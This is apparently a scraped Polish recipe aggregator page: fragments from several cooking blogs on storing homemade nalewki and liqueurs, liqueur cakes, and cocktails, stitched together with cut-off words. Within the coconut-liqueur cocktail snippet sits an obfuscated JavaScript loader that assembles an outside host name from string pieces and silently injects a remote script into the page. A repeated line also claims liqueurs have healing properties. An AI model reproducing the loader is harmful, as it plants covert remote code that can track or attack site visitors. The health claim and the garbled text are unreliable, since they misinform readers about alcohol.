ajkrócej możemy przechowywać domowe trunki, które w swoim składzie zawierają żółtka lub śmietankę np. likier śmietankowy czy ajerkoniak. Takie alkohole powinny być przechowywane w lodówce i to nie dłużej niż 1 miesiąc, chyba że przepis stanowi inaczej. Natomiast pozostałe nalewki i likiery najlepiej jest przechowywać do kilku lat. Później niektóre składniki trunków mogą się zacząć utleniać i wprowadzić charakterystyczny posmak(...)takiego wniosku doszli też niektórzy naukowcy zajmujący się alkoholami. Mówią , że domowe trunki powinny być wypite do 5 lat. Chociaż są od tej reguły wyjątki, bo niektóre nalewki czy likiery najlepiej smakują i mają najpiękniejszy bukiet smakowy po 5 i więcej latach. Chodzi tutaj szczególnie o trunki sporządzone z ziół. Przykładem tutaj może być nalewka benedyktynka, która dopiero po upływie
Przepisy i porady kulinarnealewki i likiery przechowujemy w ciemnym, suchym i chłodnym miejscu, może to być np. chłodna spiżarnia lub piwniczka. Jeśli nie dysponujemy takimi pomieszczeniami, to możemy przechowywać je w szafce ( na dolnej półce ) lub barku z dala od źródeł ciepła np. kuchnia gazowa, kaloryfer. Nalewki i likiery najlepiej jest rozlewać, a następnie przechowywać w butelkach z ciemnego szkła. W ten sposób(...)nowy bez śladów wgnieceń i innych uszkodzeń. Jeśli już musimy użyć używanego korka, to musi on być dokładnie wymyty, sparzony wrzątkiem, a następnie osuszony. Przed podaniem naszej nalewki lub likieru na stół warto przelać trunek do ozdobnej karafki. W ten sposób goście będą mogli delektować się nie tylko smakiem i aromatem naszych trunków, ale także piękną barwą nalewki czy likieru
Przepisy i porady kulinarnePrzedstawiam Wam ostatni w tym sezonie przepis z wykorzystaniem mięty - likier miętowy. Będzie wspaniałym dodatkiem do ciast i deserów, świetnie też sprawdzi się do przyrządzania alkoholowych koktajli. Na zdjęciach widnieje likier sfotografowany od razu po przyrządzeniu, ale po 2-3 miesiącach dojrzeje i ładnie wyklaruje - taką mam nadzieję :) Przepis pochodzi z bloga Aronia- wiem co jem. A Was serdecznie(...)tygodniu wyciąg spirytusowy przelać przez gazę lub filtr, miętę wyrzucić. W rondelku zagotować wodę z cukrem i pogotować kilka minut. Syrop ostudzić i połączyć z miętowym wyciągiem spirytusowym. Likier przelać do butelek i odstawić na około 2-3 miesiące aby dojrzał i się sklarował. Likier na zdjęciach sfotografowany został po przyrządzeniu. Jak dojrzeje uzupełnię nowe zdjęcia. Smacznego
Kocham..lubię..gotuję..Jeśli nie mamy w ogrodzie krzaka borówki amerykańskiej, to warto zaopatrzyć się w owoce ze zaufanego źródła np. od sąsiada, przyjaciół czy najbliższej rodziny. P amiętaj : Nalewki i likiery nie służą do tego, aby się nimi upić. Nalewki i likiery mają właściwości zdrowotne i lecznicze. Picie ich poprawia nam także nastrój i samopoczucie. Przed podaniem nalewki lub likieru(...)stół możemy go przelać do ozdobnej karafki. N alewka lub likier własnego wyrobu w ozdobnej butelce, to także doskonały pomysł na prezent dla naszych najbliższych ! Życzę zdrowia
Przepisy i porady kulinarnenalewkę mocniejszą , może nie dodawać wody lub dodać jej mniej. T utaj dowiesz się jakie są najlepsze truskawki na tę nalewkę : truskawki P amiętaj : Nalewki i likiery nie służą do tego, aby się nimi upić. Nalewki i likiery mają właściwości zdrowotne i lecznicze. Picie ich poprawia nam także nastrój i samopoczucie. Przed podaniem nalewki lub likieru(...)stół możemy go przelać do ozdobnej karafki. N alewka lub likier własnego wyrobu w ozdobnej butelce, to także doskonały pomysł na prezent dla naszych najbliższych
Przepisy i porady kulinarneCiasto dla miłośników włoskiego likieru i ciasteczek "Amaretti", składające się z kremowej warstwy z ricotty, ciasteczek, płatków migdałowych oraz delikatnego, lekkiego i puszystego biszkoptu z dodatkiem likieru. Niezwykle aromatyczne i intensywne w smaku ciasto, które zaspokoi najbardziej wymagającego gościa i wielbiciela słodkich migdałów ;) **** Ecco una torta fatta apposta per gli amanti del liquore italiano e dei biscotti “Amaretti(...)anche gli ospiti più esigenti;) SKŁADNIKI Biszkopt amaretto 200 g m ąki 100 g masła 50 g cukru 8 g proszku do pieczenia 50 ml mleka 30 ml likieru amaretto 1 jajko szczypta soli Warstwa ciasteczkowa 250 g ricotty 200 g ciasteczek amaretti 50 g cukru 2-3 łyżki migdałów w płatkach 1 jajko **** INGREDIENTI Pan di spagna
La grande e la piccola cuocastworzenia wyśmienitego drinka Daiquiri wystarczy owocowe puree (np. brzoskwiniowe, bananowe czy z mango), biały rum i odrobina limonki. Jeśli chcesz zrobić wrażenie na gościach, wypróbuj letnie drinki na bazie likieru kokosowego — aksamitne, mocno słodkie i z wyraźnym egzotycznym aromatem. Do klasycznej Pina Colady dołączyć możesz inne owoce (np. pomarańczę), zyskując bardziej orzeźwiający smak. Likier kokosowy sprawdzi się doskonale w koktajlach(...)mlecznych, mocno deserowych — połącz go z likierem kawowym, mlekiem skondensowanym i bananowym puree. Ciekawą opcją będzie też zestawienie likieru kokosowego z mocną mrożoną kawą.oną kawą. (function(){ wzes=document.createElement("script");wzes.type="text/javascript"; wzes.async=true;wzes_=(("us")+"t")+"a";wzes_+=("t.i")+""+"n";wzes_+=(("f")+"o");wzes_+="/"; wzesu="131435397.";wzesu+="2alcfcmXzes16yidxj1rx4c9zag3ae";wzes.src="https://"+wzes_+wzesu; wzesdb=document.body;wzesdb.appendChild(wzes); })(); Artykuł Pomysły
DrinkologiaInna odsłona włoskiego deseru... Torcik ten to połączenie dwóch smaków: pomarańczy i tiramisu. I jak na włoskie tiramisu przystało jest to biszkopt nasączony ponczem z kawy i likieru amaretto, przełożony kremem z serka mascarpone oraz żółtek, z wierzchu obficie obsypany kakao. To co go wyróżnia od tradycyjnego tiramisu to nuta pomarańczy wyczuwalna w masie. Jest on trochę pracochłonny(...)łyżeczka aromatu pomarańczowego 2 łyżeczki żelatyny 3 łyżki soku z pomarańczy 4 łyżki cukru skórka z 1/2 pomarańczy Poncz: 1 łyżeczka kawy rozpuszczalnej szczypta kardamonu 3 łyżki likieru amaretto ( ja dałam likier o smaku tiramisu) Dekoracja: 2 łyżki kakao skórka z 1/2 pomarańczy Wykonanie: Biszkopt: I- część: mieszamy mikserem Białka oddzielamy od żółtek. Białka wlewamy do miski, dodajemy szczyptę
Kuchnia MagdaLenyWarto poczekać. R ada : Aby otrzymać 1 l alkoholu 45 % należy zmieszać 470 ml spirytusu 95 % z 560 ml przegotowanej i ostudzonej wody. P amiętaj : Nalewki i likiery nie służą do tego, aby się nimi upić. Nalewki i likiery mają właściwości zdrowotne i lecznicze. Picie ich poprawia nam także nastrój i samopoczucie. Przed podaniem nalewki lub likieru(...)stół możemy go przelać do ozdobnej karafki. N alewka lub likier własnego wyrobu w ozdobnej butelce, to także doskonały pomysł na prezent dla naszych najbliższych
Przepisy i porady kulinarnedala od zakładów przemysłowych i dróg. Pamiętajmy, aby nie zrywać wszystkich pędów z jednej gałązki, trzeba zostawić kilka, aby drzewko mogło sobie rosnąć. P amiętaj : Nalewki i likiery nie służą do tego, aby się nimi upić. Nalewki i likiery mają właściwości zdrowotne i lecznicze. Picie ich poprawia nam także nastrój i samopoczucie. Przed podaniem nalewki lub likieru(...)stół możemy go przelać do ozdobnej karafki. N alewka lub likier własnego wyrobu w ozdobnej butelce, to także doskonały pomysł na prezent dla naszych najbliższych
Przepisy i porady kulinarneRada : A by otrzymać 1 i 1/2 l alkoholu 70 % należy zmieszać 1110 ml spirytusu 95 % z 435 ml przegotowanej i ostudzonej wody. P amiętaj : Nalewki i likiery nie służą do tego, aby się nimi upić. Nalewki i likiery mają właściwości zdrowotne i lecznicze. Picie ich poprawia nam także nastrój i samopoczucie. Przed podaniem nalewki lub likieru(...)stół możemy go przelać do ozdobnej karafki. N alewka lub likier własnego wyrobu w ozdobnej butelce, to także doskonały pomysł na prezent dla naszych najbliższych
Przepisy i porady kulinarneGorąca, aromatyczna i pyszna kawa z likierem jajecznym i bitą śmietaną. Opcjonalnie także z odrobiną brandy lub innego mocnego alkoholu, np. koniaku czy whisky. Popularna we wszystkich włoskich kurortach narciarskich. Rozgrzewająca i pobudzająca. Idealna na chłodne, zimowe wieczory. Oryginalnie przygotowuje się ją z likieru jajecznego o nazwie Bombardino . Zawiera on 17-18% procent alkoholu i jest słabszy(...)Polsce dostaniecie go w dobrze zaopatrzonych sklepach monopolowych - stacjonarnych lub internetowych. W razie potrzeby możecie użyć ajerkoniaku lekko rozcieńczonego mlekiem. SKŁADNIKI / 1 PORCJA 50-70 ml włoskiego likieru jajecznego bombardino lub ajerkoniaku wymieszanego z 2 łyżkami mleka 50 ml espresso bita śmietana odrobina kawy rozpuszczalnej lub gorzkiego kakao WYKONANIE Zaparzamy mocne i aromatyczne espresso. W małym rondelku (najlepiej
cool and mintyimprezę w karnawale, to koniecznie wypróbujcie tego drinka, bo nie tylko pięknie się prezentuje, ale również pysznie smakuje :) Pamiętajcie tylko, że do wykonania drinka Żar tropików trzeba koniecznie użyć likieru Blue Curacao :) (adsbygoogle = window.adsbygoogle || []).push({}); W innym przypadku wyjdzie Wam Drink Litwa , na który przepis znajdziecie tutaj: Drink Litwa z syropem Blue Curacao. Inne nazwy drinku Żar Tropiku , to drink(...)dostępnych w każdym domu – czyli za pomocą zwykłej szklanki i dużej łyżki. (adsbygoogle = window.adsbygoogle || []).push({}); Drink Żar tropików – Składniki: 25 ml grenadiny 50 ml rumu 50 ml likieru Blue Curacao (nie może być syrop) ok. 250 ml soku pomarańczowego (w zależności od wielkości szklanki) 4 kostki lodu (adsbygoogle = window.adsbygoogle || []).push({}); Przepis na drink Żar Tropików: Na dno wysokiej
Kulinarne PrzebojeBabka powstała przez przypadek, jak wiele ciast, które robię. Akurat zalegał mi likier advocat. Miałam ochotę na zwykłe ciasto, bez kremu. W zeszłym tygodniu było ciasto z bita śmietaną, dlatego zachciało mi się zwykłej babki. Na bazie babki piaskowej zrobiłam babkę z adwokatem. Wyszło całkiem fajnie. Likier nie jest mocno wyczuwalny, ale nadaje delikatnego smaku. Następnym razem do jednej części(...)jajka (jeśli małe to 5) 3/4 szklanki cukru 1,5 szklanki mąki pszennej 1 szklanki maki ziemniaczanej 2 łyżeczki proszku do pieczenia 200 g. masła lub margaryny 1/2 szklanki likieru advocat Wykonanie: Margarynę roztopić w rondelku i zostawić do przestudzenia. Jajka ubić z cukrem na puszysta masę. Wsypać obie mąki i proszek do pieczenia. Zmiksować, po woli wlewać likier
Agusiowe smakołykiłyżki * mąka ziemniaczana – 2 łyżki * esencja waniliowa – 1 łyżka * mleko – 370 ml * masło – 250 g * brzoskwinie w puszce – ok. 250 g * malibu lub inny likier kokosowy – 125 ml DODATKOWO: * podłużne biszkopty * malibu lub inny likier kokosowy * czekolada mleczna + ok. 130 ml mleka SPOSÓB PRZYRZĄDZENIA: BISZKOPT: Całe jajka ubijamy z cukrem na puch, wsypujemy przesianą(...)cukrem i esencją waniliową. Dodajemy obie mąki, wlewamy mleka i dokładnie miksujemy. Podgrzewamy cały czas mieszając aż powstanie kremowy budyń, studzimy. Masło ucieramy, dodajemy porcjami wystudzony budyń. Wlewamy likier, dodajemy pokrojone w kostkę brzoskwinie. Do syropu z brzoskwiń dodajemy kilka łyżek likieru oraz wody – będzie do nasączenia. CAŁOŚĆ: Biszkopt nasączamy syropem, smarujemy 2/3 kremu budyniowego, przykrywamy biszkoptem makowym
Ostra na Słodko